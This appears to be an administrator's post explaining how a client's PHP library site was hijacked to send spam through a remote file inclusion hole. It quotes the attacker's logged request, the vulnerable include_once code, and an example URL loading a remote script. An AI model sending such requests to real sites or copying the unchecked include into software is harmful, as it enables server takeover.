There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:
1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?
When I go the the php file and know how the cracker crack the system. The problem is about php.
<?php
...
$pagename =$_GET['Name'];
...
?>
...
<?php include_once("{$pagename}_main.inc");?>
...
The problem is that the $pagename does not have any gruad to check the value that got by $_Get[‘name’].
The function of include_once is allow to include the source from outside, http://example.com/aaa.php
So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,
The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:
<?php include_once("http://example.org/aaa.txt?_main.inc");?>
That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.
So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.